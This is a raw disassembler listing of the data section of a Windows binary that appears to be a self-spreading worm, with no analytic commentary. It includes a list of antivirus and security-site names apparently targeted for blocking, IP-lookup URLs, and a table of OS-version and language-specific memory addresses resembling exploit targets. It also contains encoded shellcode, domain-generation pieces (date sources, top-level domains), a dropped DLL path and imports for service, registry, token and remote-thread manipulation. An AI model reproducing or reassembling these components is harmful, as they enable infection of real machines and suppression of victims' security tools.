dd offset aPctools ; "pctools"
dd offset aPrevx ; "prevx"
dd offset aRising ; "rising"
dd offset aSecurecomputin ; "securecomputing"
dd offset aSunbelt ; "sunbelt"
dd offset aEmsisoft ; "emsisoft"
dd offset aArcabit ; "arcabit"
dd offset aCpsecure ; "cpsecure"
dd offset aSpamhaus ; "spamhaus"
dd offset aCastlecops ; "castlecops"
dd offset aThreatexpert ; "threatexpert"
dd offset aWilderssecurit ; "wilderssecurity"
dd offset aWindowsupdate ; "windowsupdate"
off_9BA4C8 dd offset dword_9A3C44 ; DATA XREF: sub_9A9D29:loc_9A9D74�r
dd offset dword_9A3C40
dd offset dword_9A3C38
dd offset dword_9A3C30
dd offset dword_9A3434+7F4h
dd offset dword_9A3434+7ECh
dd offset dword_9A3434+7E4h
dd offset dword_9A3434+7DCh
off_9BA4E8 dd offset aHttpCheckip_dy ; DATA XREF: sub_9AA572+58�r
; "http://checkip.dyndns.org"
dd offset aHttpWww_whatis ; "http://www.whatismyip.org"
dd offset aHttpWww_whatsm ; "http://www.whatsmyipaddress.com"
dd offset aHttpWww_getmyi ; "http://www.getmyip.org"
dword_9BA4F8 dd 0 ; DATA XREF: sub_9AA8E9+4A�r
; sub_9AA8E9:loc_9AA952�r
dword_9BA4FC dd 9 ; DATA XREF: sub_9AA8E9+52�r
; sub_9AA8E9+71�r
dd 1F1CB0h, 3 dup(0)
dd 5, 9, 780E1FCBh, 3 dup(0)
dd 6, 9, 7C90568Ch, 7CA27CF4h, 7C86FED3h, 7C83E413h, 7
dd 9, 7C86BEB8h, 7CA1E84Eh, 7C86A01Bh, 7C83F517h, 2, 9
dd 7801CB24h, 3 dup(0)
dd 3, 9, 6F88F727h, 6F8916E2h, 2 dup(0)
dd 3, 1, 6FD8F727h, 6FD916E2h, 2 dup(0)
dd 3, 416h, 596FF727h, 597016E2h, 2 dup(0)
dd 3, 804h, 58FBF727h, 58FC16E2h, 2 dup(0)
dd 3, 4, 5860F727h, 586116E2h, 2 dup(0)
dd 3, 5, 6FE1F727h, 6FE216E2h, 2 dup(0)
dd 3, 6, 5978F727h, 597916E2h, 2 dup(0)
dd 3, 13h, 596CF727h, 596D16E2h, 2 dup(0)
dd 3, 0Bh, 597DF727h, 597E16E2h, 2 dup(0)
dd 3, 0Ch, 595BF727h, 595C16E2h, 2 dup(0)
dd 3, 7, 6FD9F727h, 6FDA16E2h, 2 dup(0)
dd 3, 8, 592AF727h, 592B16E2h, 2 dup(0)
dd 3, 0Eh, 5970F727h, 597116E2h, 2 dup(0)
dd 3, 0Dh, 5940F727h, 594116E2h, 2 dup(0)
dd 3, 10h, 596BF727h, 596C16E2h, 2 dup(0)
dd 3, 11h, 567FF727h, 568016E2h, 2 dup(0)
dd 3, 12h, 6FD6F727h, 6FD716E2h, 2 dup(0)
dd 3, 14h, 597CF727h, 597D16E2h, 2 dup(0)
dd 3, 15h, 5941F727h, 594216E2h, 2 dup(0)
dd 3, 16h, 596BF727h, 596C16E2h, 2 dup(0)
dd 3, 19h, 6FE1F727h, 6FE216E2h, 2 dup(0)
dd 3, 0Ah, 6FDBF727h, 6FDC16E2h, 2 dup(0)
dd 3, 1Dh, 597AF727h, 597B16E2h, 2 dup(0)
dd 3, 1Fh, 5A78F727h, 5A7916E2h, 2 dup(0)
dd 4, 9, 6F88F807h, 6F8917C2h, 2 dup(0)
dd 4, 1, 6FD8F807h, 6FD917C2h, 2 dup(0)
dd 4, 416h, 596FF807h, 597017C2h, 2 dup(0)
dd 4, 804h, 58FBF807h, 58FC17C2h, 2 dup(0)
dd 2 dup(4), 5860F807h, 586117C2h, 2 dup(0)
dd 4, 5, 6FE1F807h, 6FE217C2h, 2 dup(0)
dd 4, 6, 5978F807h, 597917C2h, 2 dup(0)
dd 4, 13h, 596CF807h, 596D17C2h, 2 dup(0)
dd 4, 0Bh, 597DF807h, 597E17C2h, 2 dup(0)
dd 4, 0Ch, 595BF807h, 595C17C2h, 2 dup(0)
dd 4, 7, 6FD9F807h, 6FDA17C2h, 2 dup(0)
dd 4, 8, 592AF807h, 592B17C2h, 2 dup(0)
dd 4, 0Eh, 5970F807h, 597117C2h, 2 dup(0)
dd 4, 0Dh, 5940F807h, 594117C2h, 2 dup(0)
dd 4, 10h, 596BF807h, 596C17C2h, 2 dup(0)
dd 4, 11h, 567FF807h, 568017C2h, 2 dup(0)
dd 4, 12h, 6FD6F807h, 6FD717C2h, 2 dup(0)
dd 4, 14h, 597CF807h, 597D17C2h, 2 dup(0)
dd 4, 15h, 5941F807h, 594217C2h, 2 dup(0)
dd 4, 16h, 596BF807h, 596C17C2h, 2 dup(0)
dd 4, 19h, 6FE1F807h, 6FE217C2h, 2 dup(0)
dd 4, 0Ah, 6FDBF807h, 6FDC17C2h, 2 dup(0)
dd 4, 1Dh, 597AF807h, 597B17C2h, 2 dup(0)
dd 4, 1Fh, 5A78F807h, 5A7917C2h, 2 dup(0)
; ---------------------------------------------------------------------------
loc_9BA9F0: ; CODE XREF: .text:loc_9BA9F0�p
; DATA XREF: sub_9A8E01+27�o ...
call near ptr loc_9BA9F0+4
retn 8D5Fh
; ---------------------------------------------------------------------------
dd 3180104Fh, 816641C4h, 75534D39h, 26AFCF5h, 418B6459h
dd 0C408B2Eh, 8B1C408Bh, 8588B00h, 0A1B78Dh, 29E80000h
dd 50000000h, 0FC8BF8E2h, 9317FF56h, 0E807C683h, 18h, 5252D233h
dd 0C766CC8Bh, 512E7801h, 520477FFh, 52565152h, 0E0FF37FFh
dd 955651ADh, 8B3C4B8Bh, 3780B4Ch, 8DF633CBh, 5103B314h
dd 3128B20h, 0C0000FD3h, 0C1C0BF0Fh, 23207C0h, 3A8042h
dd 0C53BF575h, 3B460674h, 0DB721871h, 324518Bh, 14B70FD3h
dd 1C418B72h, 48BC303h, 5EC30390h, 0A260C359h, 8026768Ah
dd 7275C8ACh, 6E6F6D6Ch, 5D239900h, 0D9h
; DWORD dwMilliseconds
dwMilliseconds dd 3E8h ; DATA XREF: sub_9AD6D4:loc_9AD7CE�r
; sub_9AD8BC+C1�r ...
; volatile LONG dword_9BAAB0
dword_9BAAB0 dd 64h ; DATA XREF: sub_9AD8BC+C8�r
; sub_9ADB83+11�o
off_9BAAB4 dd offset dword_9A4484 ; DATA XREF: sub_9AD58F+19�r
dd offset dword_9A447C
dd offset dword_9A4470
dd offset dword_9A4468
dd offset dword_9A445C
; wchar_t *off_9BAAC8
off_9BAAC8 dd offset aBoot ; DATA XREF: sub_9AE850+89�r
; sub_9AE850+AB�r
; "Boot"
dd offset aCenter ; "Center"
dd offset aConfig ; "Config"
dd offset aDriver ; "Driver"
dd offset aHelper ; "Helper"
dd offset aImage ; "Image"
dd offset aInstaller ; "Installer"
dd offset aManager_0 ; "Manager"
dd offset aMicrosoft_0 ; "Microsoft"
dd offset aMonitor_0 ; "Monitor"
dd offset aNetwork ; "Network"
dd offset aSecurity_0 ; "Security"
dd offset aServer_0 ; "Server"
dd offset aShell ; "Shell"
dd offset aSupport ; "Support"
dd offset aSystem_0 ; "System"
dd offset aTask ; "Task"
dd offset aTime ; "Time"
dd offset aUniversal ; "Universal"
dd offset aUpdate ; "Update"
dd offset aWindows_0 ; "Windows"
align 10h
; int dword_9BAB20
dword_9BAB20 dd 0C351h ; DATA XREF: sub_9A86E4+33�r
; sub_9A89A9+47�r ...
align 8
dword_9BAB28 dd 0F52DA7E7h, 4912CA45h, 0D61E44E6h, 0BA1B4C72h, 8BF0723Ch
; DATA XREF: sub_9A86E4+39�o
; sub_9A89A9+4D�o ...
dd 0F375EB4Bh, 0CD44E85Eh, 21E95687h, 333406E6h, 42934976h
dd 3603E8ECh, 4DADA619h, 967F5912h, 25418501h, 7E83E2CBh
dd 0B385DF72h, 0FB59E1DDh, 2D9A7897h, 0E93DB6B2h, 39455258h
dd 9FC8901Bh, 422B5CD7h, 0D86AA6DEh, 4CF2D003h, 2E2472AFh
dd 4DF38C9Dh, 0F24D2F2Fh, 2989D649h, 0FFC6C9A2h, 0B6985FF2h
dd 92AD0968h, 10D57010h, 0B6DA1CEAh, 0CC03D4BCh, 578E9E8Dh
dd 0BCFCCF8Ch, 319EC35Bh, 8A08DA5Bh, 0BF802693h, 8045DBD2h
dd 0AF873383h, 5FF6C269h, 14349915h, 0CC880FCBh, 93E92944h
dd 0F97E9E45h, 938A8712h, 0BB43338Eh, 605B400Ch, 3140864Ch
dd 13659917h, 8AC26CE4h, 0D930A4E5h, 0BB6AD6F3h, 2DADFEBh
dd 7E386DECh, 6811EE23h, 0A87D628Ah, 0C69E9393h, 23F17BDCh
dd 3972665Dh, 56E53DC8h, 0A8D920C3h, 0E435259Ah, 7ED4993Bh
dd 74D7D161h, 0EB6AE350h, 3D315A49h, 4A29DE21h, 0D1FC30CDh
dd 7398D7FDh, 53A64B60h, 0EEF95D08h, 9721E605h, 0D6B7D9EDh
dd 0B13400BCh, 26BD6B76h, 1C2C8A60h, 2D58E6B6h, 9404D47h
dd 9DB1835Bh, 0A28E983Ch, 7A5D9E2Dh, 0C80DF107h, 0B047261Bh
dd 8701C1Ah, 9CC24C76h, 0EF33ACFh, 0A800C61Eh, 9247CB15h
dd 7F91D7Eh, 4992AA42h, 0ED7104DCh, 0E6DCE7D6h, 25BD3CADh
dd 0ECFA3218h, 0FBA5B7FAh, 5249A1CCh, 0A76030BAh, 95A3B0D3h
dd 61DAF2E5h, 97D227BDh, 3366D8C0h, 0D2130437h, 0CB3F9D36h
dd 2E6B7924h, 0BE12269h, 485BC1ADh, 0D5E18Ah, 6443787h
dd 744CAEF5h, 0A30F204Bh, 0D4086357h, 3AF0EB57h, 0C4031AE3h
dd 2D179ADFh, 441FFD7Fh, 0B749DA71h, 0B5263FBAh, 0CAFE9CDDh
dd 0ECDB7018h, 96846399h, 4C801030h, 0BC4D7333h, 2C79C3B2h
dd 41CD6883h, 7DED455Ch, 88A8BEE7h
off_9BAD28 dd offset aBaidu_com ; DATA XREF: sub_9AEC85+25�r
; "baidu.com"
dd offset aGoogle_com ; "google.com"
dd offset aYahoo_com ; "yahoo.com"
dd offset dword_9A4468
dd offset aAsk_com ; "ask.com"
dd offset aW3_org ; "w3.org"
; char *off_9BAD40
off_9BAD40 dd offset aJan ; DATA XREF: sub_9AEBA1+84�r
; "Jan"
dd offset aFeb ; "Feb"
dd offset aMar ; "Mar"
dd offset aApr ; "Apr"
dd offset aMay ; "May"
dd offset aJun ; "Jun"
dd offset aJul ; "Jul"
dd offset aAug ; "Aug"
dd offset aSep ; "Sep"
dd offset aOct ; "Oct"
dd offset aNov ; "Nov"
dd offset aDec ; "Dec"
; char *off_9BAD70
off_9BAD70 dd offset a_cc ; DATA XREF: sub_9AEECE+C3�r
; ".cc"
dd offset a_cn ; ".cn"
dd offset a_ws ; ".ws"
dd offset a_com ; ".com"
dd offset a_net ; ".net"
dd offset a_org ; ".org"
dd offset a_info ; ".info"
dd offset a_biz ; ".biz"
dbl_9BAD90 db 56h, 48h, 85h, 56h, 77h, 0, 0, 0 ; DATA XREF: sub_9AEC85+C1�w
; sub_9AED54+C�r ...
off_9BAD98 dd offset dword_9A4AEC ; DATA XREF: sub_9AF7D5+2D0�r
dd offset dword_9A4AE8
dd offset aJpeg ; "jpeg"
dd offset dword_9A4ADC
dd 8A885D04h, 11C91CEBh, 8E89Fh, 6048102Bh, 2, 9A4BB0h
byte_9BADC0 db 6 ; DATA XREF: sub_9B4B68+33�r
; sub_9B4B68+4C�r ...
db 3 dup(46h)
dd 45452929h, 46464609h, 29292946h, 1292929h, 5101101h
dd 45464646h, 40200000h, 6060202h, 666606h
byte_9BADE8 db 4 ; DATA XREF: sub_9B3D50+418�r
db 4, 2 dup(6)
dd 7070000h, 2 dup(404h)
dword_9BADF8 dd 1 ; DATA XREF: sub_9B774C�r
; sub_9B789E+39�w
dword_9BADFC dd 19930520h, 4 dup(0) ; DATA XREF: .text:009B811F�o
; __NLG_Notify+2�o
; struct _RTL_CRITICAL_SECTION CriticalSection
CriticalSection _RTL_CRITICAL_SECTION <0> ; DATA XREF: StartAddress+1A�o
; StartAddress+1E4�o ...
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
; HANDLE hObject
hObject dd 0C8h ; DATA XREF: sub_9A798D+EB�w
; sub_9A798D+12F�r
; char aMarnwkcw[]
aMarnwkcw db 'marnwkcw',0 ; DATA XREF: sub_9A798D+A9�o
; sub_9A798D:loc_9A7B0F�o ...
align 4
dword_9BAE64 dd 0 ; DATA XREF: sub_9A7170+AF�w
; sub_9ADBF1+1C�r ...
; char FileName[]
FileName db 'c:\c.dll',0 ; DATA XREF: sub_9A722A+2B�o
; sub_9A7410+5C�o ...
align 4
dd 3Dh dup(0)
db 3 dup(0)
byte_9BAF6B db 0 ; DATA XREF: sub_9A752A+121�w
; sub_9A798D+49�w
; DWORD nNumberOfBytesToWrite
nNumberOfBytesToWrite dd 0 ; DATA XREF: StartAddress+AF�o
; StartAddress+DD�r ...
; LPCVOID lpBuffer
lpBuffer dd 0 ; DATA XREF: StartAddress+BD�w
; sub_9A9318+1AE�r ...
dword_9BAF74 dd 0CA3F246h ; DATA XREF: sub_9A752A+9�r
; sub_9A798D+88�w ...
; volatile LONG dword_9BAF78
dword_9BAF78 dd 0 ; DATA XREF: StartAddress:loc_9A7808�o
; sub_9AEE25+9�r ...
align 10h
; wchar_t word_9BAF80
word_9BAF80 dw 0 ; DATA XREF: sub_9A9898+5D�o
; sub_9A993B+32�o ...
align 4
dd 80h dup(0)
db 2 dup(0)
word_9BB186 dw 0 ; DATA XREF: sub_9A993B+40�w
dword_9BB188 dd 0 ; DATA XREF: fn+20�w sub_9A9A29�w ...
; LPVOID lpAddress
lpAddress dd 0 ; DATA XREF: sub_9AAD64+3�r
; sub_9AAD64:loc_9AAD95�r ...
dword_9BB190 dd 7FFA0000h ; DATA XREF: sub_9AADCD+3�r sub_9AB49A�o
dword_9BB194 dd 0 ; DATA XREF: sub_9AAE58+3�r
; sub_9AAE58+19�r ...
dword_9BB198 dd 0 ; DATA XREF: sub_9AAF13+3�r
; sub_9AAF13+19�r ...
dword_9BB19C dd 0 ; DATA XREF: sub_9AAFA9+3�r
; sub_9AAFA9+19�r ...
dword_9BB1A0 dd 0 ; DATA XREF: .text:loc_9AB04A�r
; .text:009AB060�r ...
dword_9BB1A4 dd 0 ; DATA XREF: sub_9AB296:loc_9AB2BE�r
; sub_9AB535:loc_9AB54A�o
dword_9BB1A8 dd 0 ; DATA XREF: sub_9AB296+9�r
; sub_9AB535+D�w
align 10h
; char Buffer[]
Buffer db 100h dup(0) ; DATA XREF: sub_9AB855+1CE�o
; sub_9AC2BE+16�o
dword_9BB2B0 dd 0 ; DATA XREF: sub_9AD6D4+1A�r
; sub_9AD8BC+1D�r ...
; volatile LONG Addend
Addend dd 0 ; DATA XREF: sub_9AD6D4+F�o
; sub_9AD6D4:loc_9AD81C�o ...
; volatile LONG dword_9BB2B8
dword_9BB2B8 dd 0 ; DATA XREF: sub_9ADA44+13�r
; sub_9ADBF1+D9�r ...
dword_9BB2BC dd 0 ; DATA XREF: sub_9ADA44+1B�r
; sub_9ADBF1+1D1�w ...
; volatile LONG dword_9BB2C0
dword_9BB2C0 dd 0 ; DATA XREF: sub_9AD8BC+110�o
; sub_9ADA44+D7�o ...
; volatile LONG Target
Target dd 0 ; DATA XREF: sub_9AD831+3C�o
; sub_9ADA44+E2�r
; volatile LONG Destination
Destination dd 0 ; DATA XREF: sub_9AD553+4�o
; sub_9AD569+8�o
; volatile LONG dword_9BB2CC
dword_9BB2CC dd 0 ; DATA XREF: sub_9AEE25+3C�o
; sub_9AEECE+53�w ...
; char dword_9BB2D0[]
dword_9BB2D0 dd 3 dup(0) ; DATA XREF: sub_9AA646+D�o
; sub_9AF7D5+70�o ...
dword_9BB2DC dd 3 dup(0) ; DATA XREF: sub_9AF7D5+AB�o
; sub_9AFD0A+5A�o
dword_9BB2E8 dd 3 dup(0) ; DATA XREF: sub_9AF7D5+96�o
; sub_9AFD0A+74�o ...
; volatile LONG dword_9BB2F4
dword_9BB2F4 dd 0 ; DATA XREF: sub_9ADA44:loc_9ADA66�r
; sub_9ADBF1+17C�r ...
dword_9BB2F8 dd 0 ; DATA XREF: sub_9AFC25+63�r
; sub_9AFC25+70�w
; size_t dword_9BB2FC
dword_9BB2FC dd 0 ; DATA XREF: sub_9B00F5+77�r
; sub_9B0216+8E�w
; void *dword_9BB300
dword_9BB300 dd 0 ; DATA XREF: sub_9B00F5:loc_9B0162�r
; sub_9B0216+7E�w
dword_9BB304 dd 0 ; DATA XREF: sub_9B0191:loc_9B01F7�r
; sub_9B0216+E�r ...
; void *Base
Base dd 0 ; DATA XREF: sub_9B00F5+17�r
; sub_9B0216+B7�w
; size_t NumOfElements
NumOfElements dd 0 ; DATA XREF: sub_9B00F5+20�r
; sub_9B0216+C7�w
; void *dword_9BB310
dword_9BB310 dd 0 ; DATA XREF: sub_9B00F5:loc_9B0137�r
; sub_9B0216+97�w
; size_t dword_9BB314
dword_9BB314 dd 0 ; DATA XREF: sub_9B00F5+4C�r
; sub_9B0216+A7�w
dword_9BB318 dd 0 ; DATA XREF: sub_9B4F4A+4�r
; sub_9B4F5C+19�w ...
dword_9BB31C dd 0 ; DATA XREF: sub_9B4F4A+C�r
; sub_9B4F5C+C�r ...
dword_9BB320 dd 0 ; DATA XREF: sub_9B4F5C+1E�w
; sub_9B4FFF+23�r ...
dword_9BB324 dd 0 ; DATA XREF: sub_9B4F5C+31�w
; sub_9B4FA3+F�r ...
dword_9BB328 dd 0 ; DATA XREF: sub_9B4F5C+36�w
; sub_9B4FA3+19�r ...
dword_9BB32C dd 0 ; DATA XREF: sub_9B4F5C+3B�w
; sub_9B4FA3+23�r ...
dword_9BB330 dd 1 ; DATA XREF: _CRT_INIT(x,x,x)+8�r
; _CRT_INIT(x,x,x)+10�w ...
dword_9BB334 dd 0 ; DATA XREF: sub_9B759C+E0�r
; sub_9B789E+8A�w
; RPC_BINDING_HANDLE Binding
Binding dd 0 ; DATA XREF: .text:pStubDescriptor�o
; sub_9AA799+2F�o ...
dword_9BB33C dd 0 ; DATA XREF: _CRT_INIT(x,x,x)+21�w
dword_9BB340 dd 34710h ; DATA XREF: _CRT_INIT(x,x,x)+54�w
; _CRT_INIT(x,x,x)+75�r
; void *Memory
Memory dd 34710h ; DATA XREF: _CRT_INIT(x,x,x)+37�w
; _CRT_INIT(x,x,x)+45�r ...
dword_9BB348 dd 0 ; DATA XREF: start:loc_9B8432�r
; start+82�r
dd 0B2Dh dup(0)
dd 1C8h, 0A4h, 6C745201h, 69776E55h, 100646Eh, 74696157h
dd 4D726F46h, 69746C75h, 4F656C70h, 63656A62h, 1007374h
dd 65657246h, 7262694Ch, 797261h, 65704F01h, 6576456Eh
dd 41746Eh, 74654701h, 73726556h, 456E6F69h, 1004178h
dd 53746547h, 65747379h, 7269446Dh, 6F746365h, 417972h
dd 6F6C4301h, 61486573h, 656C646Eh, 6C470100h, 6C61626Fh
dd 65657246h, 6C470100h, 6C61626Fh, 6F6C6C41h, 47010063h
dd 614C7465h, 72457473h, 726F72h, 74654701h, 72727543h
dd 50746E65h, 65636F72h, 1007373h, 65646957h, 72616843h
dd 754D6F54h, 4269746Ch, 657479h, 74654701h, 73726556h
dd 6E6F69h, 766F4D01h, 6C694665h, 41784565h, 6F4D0100h
dd 69466576h, 41656Ch, 74654701h, 706D6554h, 68746150h
dd 53010041h, 7065656Ch, 65440100h, 6574656Ch, 656C6946h
dd 4C010041h, 466B636Fh, 656C69h, 74654701h, 656C6946h
dd 657A6953h, 72430100h, 65746165h, 656C6946h, 43010041h
dd 74616572h, 72685465h, 646165h, 74655301h, 6F727245h
dd 646F4D72h, 45010065h, 50746978h, 65636F72h, 1007373h
dd 6E65704Fh, 6574754Dh, 1004178h, 43746547h, 616D6D6Fh
dd 694C646Eh, 41656Eh, 65724301h, 4D657461h, 78657475h
dd 47010041h, 6F437465h, 7475706Dh, 614E7265h, 41656Dh
dd 74654701h, 75646F4Dh, 6946656Ch, 614E656Ch, 41656Dh
dd 74654701h, 72727543h, 50746E65h, 65636F72h, 64497373h
dd 69440100h, 6C626173h, 72685465h, 4C646165h, 61726269h
dd 61437972h, 736C6Ch, 76654401h, 49656369h, 6E6F436Fh
dd 6C6F7274h, 72570100h, 46657469h, 656C69h, 74654701h
dd 706D6554h, 656C6946h, 656D614Eh, 56010041h, 75747269h
dd 72466C61h, 1006565h, 50746547h, 41636F72h, 65726464h
dd 1007373h, 64616F4Ch, 7262694Ch, 41797261h, 69560100h
dd 61757472h, 6C6C416Ch, 100636Fh, 74737953h, 69546D65h
dd 6F54656Dh, 656C6946h, 656D6954h, 65470100h, 73795374h
dd 546D6574h, 656D69h, 61654C01h, 72436576h, 63697469h
dd 65536C61h, 6F697463h, 4501006Eh, 7265746Eh, 74697243h
dd 6C616369h, 74636553h, 6E6F69h, 696E4901h, 6C616974h
dd 43657A69h, 69746972h, 536C6163h, 69746365h, 1006E6Fh
dd 64616552h, 656C6946h, 6F430100h, 63656E6Eh, 6D614E74h
dd 69506465h, 1006570h, 61657243h, 614E6574h, 5064656Dh
dd 41657069h, 65440100h, 6574656Ch, 656C6946h, 47010057h
dd 6F4C7465h, 546C6163h, 656D69h, 65724301h, 46657461h
dd 57656C69h, 69460100h, 6C43646Eh, 65736Fh, 6E694601h
dd 72694664h, 69467473h, 57656Ch, 6C754D01h, 79426974h
dd 6F546574h, 65646957h, 72616843h, 65470100h, 6D6F4374h
dd 65747570h, 6D614E72h, 1005765h, 6D726554h, 74616E69h
dd 72685465h, 646165h, 74654701h, 72727543h, 54746E65h
dd 61657268h, 644964h, 69615701h, 726F4674h, 676E6953h
dd 624F656Ch, 7463656Ah, 65530100h, 73614C74h, 72724574h
dd 100726Fh, 75646F4Dh, 3233656Ch, 7478654Eh, 6F4D0100h
dd 656C7564h, 69463233h, 747372h, 65724301h, 54657461h
dd 686C6F6Fh, 33706C65h, 616E5332h, 6F687370h, 53010074h
dd 68547465h, 64616572h, 6F697250h, 79746972h, 69560100h
dd 61757472h, 6F72506Ch, 74636574h, 65470100h, 72685474h
dd 50646165h, 726F6972h, 797469h, 74654701h, 72727543h
dd 54746E65h, 61657268h, 47010064h, 6F4D7465h, 656C7564h
dd 646E6148h, 41656Ch, 65724301h, 44657461h, 63657269h
dd 79726F74h, 46010041h, 46646E69h, 74737269h, 656C6946h
dd 47010041h, 6F567465h, 656D756Ch, 6F666E49h, 74616D72h
dd 416E6F69h, 65470100h, 69724474h, 79546576h, 416570h
dd 74654701h, 69676F4Ch, 446C6163h, 65766972h, 47010073h
dd 69547465h, 6F436B63h, 746E75h, 65755101h, 65507972h
dd 726F6672h, 636E616Dh, 756F4365h, 7265746Eh, 65530100h
dd 6C694674h, 6D695465h, 47010065h, 69467465h, 6954656Ch
dd 100656Dh, 70616548h, 6F6C6C41h, 47010063h, 72507465h
dd 7365636Fh, 61654873h, 48010070h, 46706165h, 656572h
dd 6F725001h, 73736563h, 654E3233h, 1007478h, 636F7250h
dd 33737365h, 72694632h, 1007473h, 65726854h, 32336461h
dd 7478654Eh, 704F0100h, 68546E65h, 64616572h, 68540100h
dd 64616572h, 69463233h, 747372h, 65724301h, 52657461h
dd 746F6D65h, 72685465h, 646165h, 69725701h, 72506574h
dd 7365636Fh, 6D654D73h, 79726Fh, 72695601h, 6C617574h
dd 6F6C6C41h, 784563h, 65704F01h, 6F72506Eh, 73736563h
dd 65520100h, 72506461h, 7365636Fh, 6D654D73h, 79726Fh
dd 74655301h, 656C6946h, 72747441h, 74756269h, 417365h
dd 74654701h, 656C6946h, 72747441h, 74756269h, 417365h
dd 74654701h, 72727543h, 44746E65h, 63657269h, 79726F74h
dd 43010041h, 74616572h, 6F725065h, 73736563h, 49010041h
dd 7265746Eh, 6B636F6Ch, 6F436465h, 7261706Dh, 63784565h
dd 676E6168h, 49010065h, 7265746Eh, 6B636F6Ch, 65446465h
dd 6D657263h, 746E65h, 746E4901h, 6F6C7265h, 64656B63h
dd 72636E49h, 6E656D65h, 53010074h, 76457465h, 746E65h
dd 65724301h, 45657461h, 746E6576h, 49010041h, 7265746Eh
dd 6B636F6Ch, 78456465h, 6E616863h, 6567h, 1D5h, 0
dd 67655201h, 6E65704Fh, 4579654Bh, 1005778h
aRegsetkeysecur db 'RegSetKeySecurity',0
dw 4F01h
aPenscmanagerw db 'penSCManagerW',0
dw 4501h
aNumservicessta db 'numServicesStatusW',0
db 1
aOpenservicew db 'OpenServiceW',0
db 1, 51h, 75h
aEryserviceconf db 'eryServiceConfigW',0
dw 5101h
aUeryservicecon db 'ueryServiceConfig2W',0
dd 706D4901h, 6F737265h, 6574616Eh, 67676F4Ch, 6E4F6465h
dd 72657355h, 6E490100h, 61697469h, 657A696Ch, 75636553h
dd 79746972h, 63736544h, 74706972h, 100726Fh, 4C746547h
dd 74676E65h, 64695368h, 6E490100h, 61697469h, 657A696Ch
dd 6C6341h, 64644101h, 65636341h, 6C417373h, 65776F6Ch
dd 65634164h, 65530100h, 63655374h, 74697275h, 73654479h
dd 70697263h, 44726F74h, 6C6361h, 74655301h, 656C6946h
dd 75636553h, 79746972h, 4C010041h, 756B6F6Fh, 69725070h
dd 656C6976h, 61566567h, 4165756Ch, 64410100h, 7473756Ah
dd 656B6F54h, 6972506Eh, 656C6976h, 736567h, 61684301h
dd 5365676Eh, 69767265h, 6F436563h, 6769666Eh, 52010041h
dd 72657665h, 536F5474h, 666C65h, 67655201h, 56746553h
dd 65756C61h, 417845h, 67655201h, 6E65704Fh, 4579654Bh
dd 1004178h, 51676552h, 79726575h, 756C6156h, 41784565h
dd 65520100h, 6F6C4367h, 654B6573h, 43010079h, 74616572h
dd 72655365h, 65636976h, 53010041h, 74726174h, 76726553h
dd 41656369h, 704F0100h, 43536E65h, 616E614Dh, 41726567h
dd 704F0100h, 65536E65h, 63697672h, 1004165h, 736F6C43h
dd 72655365h, 65636976h, 646E6148h, 100656Ch, 746E6F43h
dd 536C6F72h, 69767265h, 1006563h, 656C6544h, 65536574h
dd 63697672h, 4F010065h, 506E6570h, 65636F72h, 6F547373h
dd 6E656Bh, 74654701h, 656B6F54h, 666E496Eh, 616D726Fh
dd 6E6F6974h, 6C410100h, 61636F6Ch, 6E416574h, 696E4964h
dd 6C616974h, 53657A69h, 1006469h, 61757145h, 6469536Ch
dd 72460100h, 69536565h, 52010064h, 6E456765h, 654B6D75h
dd 57784579h, 65520100h, 74655367h, 756C6156h, 57784565h
dd 65520100h, 65755167h, 61567972h, 4565756Ch, 1005778h
dd 46676552h, 6873756Ch, 79654Bh, 67655201h, 61657243h
dd 654B6574h, 57784579h, 65520100h, 65724367h, 4B657461h
dd 78457965h, 0E2000041h, 2C000001h, 1000002h, 74654E57h
dd 43646441h, 656E6E6Fh, 6F697463h, 57326Eh, 654E5701h
dd 64644174h, 6E6E6F43h, 69746365h, 41326E6Fh, 4E570100h
dd 61437465h, 6C65636Eh, 6E6E6F43h, 69746365h, 41326E6Fh
dd 4E570100h, 61437465h, 6C65636Eh, 6E6E6F43h, 69746365h
dd 57326E6Fh, 1EA0000h, 2400000h, 5F010000h, 74696E69h
dd 6D726574h, 615F0100h, 73756A64h, 64665F74h, 1007669h
dd 6C6C6163h, 100636Fh, 61637373h, 100666Eh, 6D6D656Dh
dd 65766Fh, 65736201h, 68637261h, 62610100h, 73010073h
dd 1006E69h, 676F6Ch, 72747301h, 6B6F74h, 6F746101h, 5F010069h
dd 64736377h, 1007075h, 6E697270h, 1006674h, 63727473h
dd 1007970h, 63727473h, 100706Dh, 63727473h, 1007461h
dd 73736377h, 1007274h, 7274735Fh, 72776Ch, 72747301h
dd 727473h, 74735F01h, 70756472h, 63770100h, 70636E73h
dd 6D010079h, 6F6C6C61h, 66010063h, 656572h, 61657201h
dd 636F6C6Ch, 63770100h, 74616373h, 63770100h, 79706373h
dd 63770100h, 706D6373h, 735F0100h, 7270776Eh, 66746E69h
dd 63770100h, 6E656C73h, 74730100h, 72686372h, 656D0100h
dd 7465736Dh, 656D0100h, 7970636Dh, 656D0100h, 706D636Dh
dd 74730100h, 61636E72h, 73010074h, 646E6172h, 61720100h
dd 100646Eh, 706E735Fh, 746E6972h, 73010066h, 636E7274h
dd 1007970h, 72727473h, 726863h, 74735F01h, 63696E72h
dd 100706Dh, 6C727473h, 1006E65h, 7274735Fh, 706D6369h
dd 6D5F0100h, 63696D65h, 706Dh, 1F5h, 2F0h, 74654E01h
dd 42697041h, 65666675h, 65724672h, 4E010065h, 63537465h
dd 75646568h, 6F4A656Ch, 6C654462h, 654E0100h, 68635374h
dd 6C756465h, 626F4A65h, 6D756E45h, 654E0100h, 68635374h
dd 6C756465h, 626F4A65h, 646441h, 74654E01h, 72657355h
dd 6D756E45h, 654E0100h, 72655374h, 45726576h, 6D756Eh
dd 74654E01h, 74736B57h, 74654761h, 6F666E49h, 2020000h
dd 41C0000h, 43010000h, 696E496Fh, 6C616974h, 53657A69h
dd 72756365h, 797469h, 436F4301h, 74616572h, 736E4965h
dd 636E6174h, 43010065h, 696E556Fh, 6974696Eh, 7A696C61h
dd 43010065h, 696E496Fh, 6C616974h, 45657A69h, 0C000078h
dd 10000002h, 0FF000003h, 8FF0007h, 6FF00h, 0FF0002FFh
dd 19000009h, 28000002h, 1000003h, 42637052h, 69646E69h
dd 7246676Eh, 74536D6Fh, 676E6972h, 646E6942h, 41676E69h
